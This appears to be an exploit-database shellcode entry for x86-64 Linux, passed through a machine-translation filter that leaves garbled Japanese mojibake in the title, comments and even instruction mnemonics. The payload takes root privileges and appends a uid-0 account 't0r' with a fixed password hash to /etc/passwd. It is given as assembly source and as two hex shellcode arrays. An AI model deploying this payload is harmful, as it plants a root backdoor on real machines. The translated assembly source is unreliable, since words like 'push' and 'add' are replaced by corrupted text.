Linux/x86-64 - ÄÉ²Ã¤¹¤ë »ÈÍÑ¼Ô with passwd

¤³¤Î¥Ú¡¼¥¸¤ÏEtoJÃà¸ìËÝÌõ¥Õ¥£¥ë¥¿¤Ë¤è¤Ã¤ÆËÝÌõÀ¸À®¤µ¤ì¤Þ¤·¤¿¡£
Linux/x86-64 - ÄÉ²Ã¤¹¤ë »ÈÍÑ¼Ô with passwd - 189 bytes
;sc_adduser01.S
;Arch:          x86_64, Linux
;
;Author:        0_o -- null_null
;           nu11.nu11 [at] yahoo.com
;Date:          2012-03-05
;
;¼ý½¸¤¹¤ë an executable: nasm -f elf64 sc_adduser.S
;           ld -o sc_adduser sc_adduser.o
;¼ý½¸¤¹¤ë an È¿ÂÐ¤¹¤ë: nasm -o sc_adduser_obj sc_adduser.S
;
;ÌÜÅª:       ÄÉ²Ã¤¹¤ës »ÈÍÑ¼Ô "t0r" with password "¾¡Íø¼Ô" to /etc/passwd
;¿ë¹Ô¤¹¤ë¡¿È¯¸ú¤µ¤»¤ëd syscalls:     setreuid, setregid, open, Îá¾õ, ¤Î¶á¤¯¤Ë, ½Ð¸ý
;Result:        t0r:3UgT5tXKUkUFg:0:0::/root:/ÃùÂ¢½ê/bash
;syscall op codes:  /usr/´Þ¤à/x86_64-linux-gnu/asm/unistd_64.h
BITS 64
[SECTION .text]
Á´À¤³¦¤Î _start
_start:
    ;sys_setreuid(uint ruid, uint euid)
        xor     rax,    rax
        mov     al,     113                     ;syscall sys_setreuid
        xor     rbx,    rbx                     ;arg 1 -- »Ï¤á¤ë¡¤·è¤á¤ë real uid to root
        mov     rcx,    rbx                     ;arg 2 -- »Ï¤á¤ë¡¤·è¤á¤ë ¸ú²ÌÅª¤Ê uid to root
        syscall
        ;sys_setregid(uint rgid, uint egid)
        xor     rax,    rax
        mov     al,     114                     ;syscall sys_setregid
    xor     rbx,    rbx                     ;arg 1 -- »Ï¤á¤ë¡¤·è¤á¤ë real uid to root
        mov     rcx,    rbx                     ;arg 2 -- »Ï¤á¤ë¡¤·è¤á¤ë ¸ú²ÌÅª¤Ê uid to root
        syscall
    ;²¡¤·¿Ê¤á¤ë all strings on the stack »öÁ°¤Î to ¤È¤¸¹þ¤ß¡¿Äó½Ð¤¹¤ë Áàºî¡¿¼ê½Ñs.
    xor rbx,    rbx
    mov     ebx,    0x647773FF
        shr     rbx,    8
        ²¡¤·¿Ê¤á¤ë    rbx                             ;string \00dws
        mov     rbx,    0x7361702f6374652f
        ²¡¤·¿Ê¤á¤ë    rbx                             ;string ¼¡Âè¤ËÂ»¤Ê¤¦/cte/
    mov     rbx,    0x0A687361622F6EFF
        shr     rbx,    8
        ²¡¤·¿Ê¤á¤ë    rbx                             ;string \00\nhsab/n
        mov     rbx,    0x69622F3A746F6F72
        ²¡¤·¿Ê¤á¤ë    rbx                             ;string ib/:toor
        mov     rbx,    0x2F3A3A303A303A67
        ²¡¤·¿Ê¤á¤ë    rbx                             ;string /::0:0:g
    mov rbx,    0x46556B554B587435
    ²¡¤·¿Ê¤á¤ë    rbx             ;string FUkUKXt5
    mov rbx,    0x546755333A723074
    ²¡¤·¿Ê¤á¤ë    rbx             ;string TgU3:r0t
    ;½øËë to doing anything useful...
    mov rbx,    rsp         ;save stack pointer for later use
    ²¡¤·¿Ê¤á¤ë    rbp             ;Ãß¤¨¤ë¡¿Å¹ base pointer to stack so it can be ²óÉü¤¹¤ëd later
    mov rbp,    rsp         ;»Ï¤á¤ë¡¤·è¤á¤ë base pointer to ¸½ºß¤Î stack pointer
    ;sys_open(char* fname, int ´ús, int Êý¼°)
    sub rsp,        16
    mov [rbp - 16], rbx     ;Ãß¤¨¤ë¡¿Å¹ pointer to "t0r..../bash"
    mov si,     0x0401      ;arg 2 -- ´ús
    mov rdi,        rbx
    ÄÉ²Ã¤¹¤ë rdi,        40      ;arg 1 -- pointer to "/etc/passwd"
    xor rax,        rax
    mov al,     2       ;syscall sys_open
    syscall
    ;sys_write(uint fd, char* buf, uint size)
    mov [rbp - 4],  eax     ;arg 1 -- fd is retval of sys_open. save fd to stack for later use.
    mov rcx,        rbx     ;arg 2 -- ÉéÃ´ rcx with pointer to string "t0r.../bash"
    xor rdx,        rdx
    mov dl,     39      ;arg 3 -- ÉéÃ´ rdx with size of string "t0r.../bash\00"
    mov rsi,        rcx     ;arg 2 -- move to source º÷°ú ÅÐÏ¿¡Ê¤¹¤ë¡Ë
    mov rdi,        rax     ;arg 1 -- move to ÌÜÅªÃÏ º÷°ú ÅÐÏ¿¡Ê¤¹¤ë¡Ë
    xor     rax,            rax
        mov     al,             1               ;syscall sys_write
        syscall
    ;sys_close(uint fd)
    xor rdi,        rdi
    mov edi,        [rbp - 4]   ;arg 1 -- ÉéÃ´ Ãß¤¨¤ë¡¿Å¹d ¤È¤¸¹þ¤ß¡¿Äó½Ð¤¹¤ë descriptor to ÌÜÅªÃÏ º÷°ú ÅÐÏ¿¡Ê¤¹¤ë¡Ë
    xor rax,        rax
    mov al,     3       ;syscall sys_close
    syscall
    ;sys_exit(int err_code)
    xor rax,    rax
    mov al, 60          ;syscall sys_exit
    xor rbx,    rbx         ;arg 1 -- error code
    syscall
;char shellcode[] =
;   "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31"
;   "\xc0\xb0\x72\x48\x31\xdb\x48\x31\xc9\x0f\x05\x48\x31\xdb\xbb"
;   "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63"
;   "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a"
;   "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69"
;   "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35"
;   "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33"
;   "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10"
;   "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28"
;   "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31"
;   "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f"
;   "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48"
;   "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";
;
;Æ±Åù¡Ê¤Î¡Ë code:
;
;char shellcode[] =
;   "\x48\x31\xc0\xb0\x71\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31"
;   "\xc0\xb0\x72\x48\x31\xdb\x48\x89\xd9\x0f\x05\x48\x31\xdb\xbb"
;   "\xff\x73\x77\x64\x48\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63"
;   "\x2f\x70\x61\x73\x53\x48\xbb\xff\x6e\x2f\x62\x61\x73\x68\x0a"
;   "\x48\xc1\xeb\x08\x53\x48\xbb\x72\x6f\x6f\x74\x3a\x2f\x62\x69"
;   "\x53\x48\xbb\x67\x3a\x30\x3a\x30\x3a\x3a\x2f\x53\x48\xbb\x35"
;   "\x74\x58\x4b\x55\x6b\x55\x46\x53\x48\xbb\x74\x30\x72\x3a\x33"
;   "\x55\x67\x54\x53\x48\x89\xe3\x55\x48\x89\xe5\x48\x83\xec\x10"
;   "\x48\x89\x5d\xf0\x66\xbe\x01\x04\x48\x89\xdf\x48\x83\xc7\x28"
;   "\x48\x31\xc0\xb0\x02\x0f\x05\x89\x45\xfc\x48\x89\xd9\x48\x31"
;   "\xd2\xb2\x27\x48\x89\xce\x48\x89\xc7\x48\x31\xc0\xb0\x01\x0f"
;   "\x05\x48\x31\xff\x8b\x7d\xfc\x48\x31\xc0\xb0\x03\x0f\x05\x48"
;   "\x31\xc0\xb0\x3c\x48\x31\xdb\x0f\x05";